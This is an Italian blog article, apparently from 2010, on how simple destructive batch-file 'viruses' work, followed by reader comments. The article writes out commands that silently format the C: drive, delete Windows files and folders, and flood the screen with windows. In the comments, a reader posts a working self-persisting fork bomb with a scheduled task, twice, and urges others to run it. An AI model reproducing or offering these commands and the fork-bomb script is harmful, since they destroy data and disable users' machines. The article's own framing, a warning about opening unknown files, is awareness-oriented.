Con questo articolo vogliamo spiegare come possiamo essere infettati da dei semplici virus che possono essere scritti in linguaggio batch. Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)
Prima di cominciare dobbiamo comunque aggiungere che questi virus non sono molto pericolosi perchè, benchè possano creare danni seri, ormai nelle ultime versioni di windows bisogna avere il consenso dell’amministratore per apportare delle modifiche al file di sistema, quindi lo script malevolo non riuscirebbe ad agire indisturbato o verrebbe comunque bloccato.
Ancora una nota prima di cominciare: dobbiamo spiegare in cosa consistono gli script batch. Questi file (di solito di piccole dimensioni) sono salvati in formato .bat e non sono altro dei comandi che vengono dati al promt di ms-dos. Tutti coloro che hanno una minima conoscenza di dos possono creare questi file. Vediamo alcuni esempi di codice che possono aiutarci a capire meglio come funzionano questi virus. Contate che si creano semplicemente scrivendo il codice sul blocco note e salvandolo come “nome”.bat.
format c: /autotest /q /u
Salvando questo testo sul blocco note in un file .bat avrete creato un virus che formatta l’hard disk senza chiedere nessuna conferma all’utente. La maggioranza degli antivirus trova e annulla questo tipo di file.
start
start
start
start
….
Ognuno di questi comandi apre una finestra del prompt dei comandi di dos…immaginate cosa potrebbe succedere se scriveste 2000/3000 start.
erase /q C:/Windows/nomefile
Questo comando cancellerebbe il file “nomefile” dalla cartella Windows senza chiedere nessuna conferma di cancellazione.
deltree c:/Windows
In questo modo cancellerebbe tutto il contenuto della cartella windows. Bisogna dire in questo caso che questo comando nello specifico (come molti altri) è stato disattivato dalle ultime versioni di windows (per esempio nelle versioni Home di Win 7)
In conclusione dobbiamo aggiungere che questi comandi potrebbero essere combinati e messi uno dopo l’altro per creare più danni.
In questo articolo abbiamo visto solo alcune delle potenzialità dei file batch, ovviamente è una tecnica un po’ datata e con scarse possibilità di successo anche perchè il file deve essere eseguito per funzionare (anche se potrebbe essere messo in autorun) comunque ci ricorda una buona regola della sicurezza informatica: se non sappiamo da chi arriva o cosa contiene un file o una mail NON APRIAMOLO!
AVG Antivirus gratuito
State cercando un anti-virus potente che non richiede abbonamenti per poter continuare a usufruire degli... Un Virus all’Attacco dei Droni Predator
E’ una notizia che se confermata sarebbe clamorosa: sembra che i droni americani Predator siano stati... Combatti gli Zero Day con DriveSentry
Chi si occupa di sicurezza o chi legge PillolHacking.Net sa che le vere minacce di Internet sono gli... Cosa sono gli Zero-Day?
Gli zero-day (o 0day) sono tipi di attacchi informatici che sfruttano bug software non ancora noti e...
ago 22, 2010 at 15:43:15
Bell’articolo Dani, ma se nn mi chiami in causa nn mi sento partecipe xD
Ecco: “vengono dati al promt di ms-dos.”
Ed anche questa volta ho fatto il mio sporco lavoro
ago 23, 2010 at 16:29:44
questo non è un virus. è uno script scemo, fatto da un lamer.
Prima di tutto un virus, per essere definito tale, deve replicarsi (ed il tuo non lo fa)
Seconda cosa: crei un file per lanciare un comando? a che pro?
In questo articolo di “hacker” c’è solo un lontano miraggio.
CHE SCHIFO!
ago 23, 2010 at 17:04:23
Mia nonna ieri mi ha inviato un file:
nonna.bat
Lo posso aprire? No perchè dopo aver letto la vostra guida ho paura. Complimenti ottimo articolo, lo farò leggere a babbo natale cosi la prosisma volta che mi invia un file per email con scritto buon-natale.bat!
Bello.. .BELLISSIMO!!
Sicuramente l’hai scritto tu il kernel di Windows, conosci troppe cose del DOS
enjoy albm friend.
saluti collega
olfridenzen
salut
cia
ago 23, 2010 at 21:03:28
Raga è vero che lo script di sopra non è il massimo dell’hacking, però Dani aveva fatto una sottile premessa:
“Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)”
Quindi le vostre critiche (?) sono un tantino fuori luogo..
ps: l’hacking è anche voglia di conoscere, e magari qualcuno che inizia non è a conoscenza dei file bat quindi l’articolo ha comunque una sua valenza
ago 24, 2010 at 12:59:32
Ovviamente sottoscrivo il commento di TroUblE
ago 24, 2010 at 16:10:47
Sono pienamente d’accordo con TroUbIE: l’hacking è anche la conoscenza. Cito il jargon:
The ‘hacker culture’ is actually a loosely networked collection of subcultures
Traduzione (con Google
):
La ‘cultura hacker’ è in realtà una rete di raccolta delle sottoculture
Anche se la traduzione non è al top, spero che citando il jargon si riesca a zittire l’ignoranza di Sandro e RoBYCoNTe.
ago 24, 2010 at 22:26:14
Vado via un paio di giorni è succede il finimondo
A parte tutto, penso che TroUblE (che intanto ringrazio per la sua correzione…penso che ti manderò un premio xD) e Shadowy Viper abbiano già detto quanto c’era da dire ma voglio sottolineare solo una cosa:
questo blog non è fatto solo per “esperti” come voi. Sapete, esistono delle persone sulla terra che alcune cose non le sanno (anche se penso che voi sappiate tutto visto i vostri commenti…) e che magari vorrebbero scoprirle, ma cosa ne so io: sono solo uno scrittore di scarso successo.
ago 26, 2010 at 09:56:03
questa invece è una forkbomb creata da me… molto meglio che scrivere 2000 volte start! Provate a lanciarla… copia l’originale in un path specifico, setta un operazione schedulata in modo che parta in automatico ad ogni riavvio e crea un loop con un infinità di finestre ad una velocità incredibile obbligando a spegnere il pc dal pulsante di alimentazione… provare per credere!
L’ho battezzata blacksheep, spero vi piaccia!
@echo off
setLocal EnableDelayedExpansion
rem controlla esistenza del file e nel caso non esista lo copia e crea lo scheduled task e cancella l’originale
IF EXIST %APPDATA%\bs.bat GOTO :FORKBOMB
COPY %0 %APPDATA%\bs.bat
SCHTASKS /Create /SC MINUTE /MO 5 /TN BlackSheep /TR %APPDATA%\bs.bat /F”
GOTO :END
:FORKBOMB
rem CREA IL LOOP CON LA FORKBOMB
:loop
set /a X=10000
set /a N+=1
start /MIN %0
start /MIN %0 %0
if !N! gtr !X! goto :END2
goto :loop
:END
del %0
:END2
exit
ago 26, 2010 at 10:03:09
Bella! Mi piace!
Ti chiedo un favore, a beneficio di tutti…se vuoi…potresti spiegare ogni passaggio dello script?
ago 26, 2010 at 10:13:25
Così dovrebbe essere più comprensibile, alcuni sono comandi propri del batch scripting, se cerchi in rete i comandi che non capisci trovi tonnellate di doc.
spero di esserti stato utile!
@echo off
setLocal EnableDelayedExpansion
rem controlla esistenza del file nella directory appdata e nel caso non esista lo copia nella directory e cancella l’originale, nel caso esista va alla riga forkbomb e lancia l’attacco.
IF EXIST %APPDATA%\bs.bat GOTO :FORKBOMB
COPY %0 %APPDATA%\bs.bat
rem crea lo scheduled task
SCHTASKS /Create /SC MINUTE /MO 5 /TN BlackSheep /TR %APPDATA%\bs.bat /F”
rem va alla riga end
GOTO :END
:FORKBOMB
rem CREA IL LOOP CON LA FORKBOMB
:loop
set /a X=10000
set /a N+=1
start /MIN %0
start /MIN %0 %0
if !N! gtr !X! goto :END2
goto :loop
:END
del %0
:END2
exit
ago 26, 2010 at 10:15:29
grazie. Così anche i lettori meno esperti avranno le idee più chiare…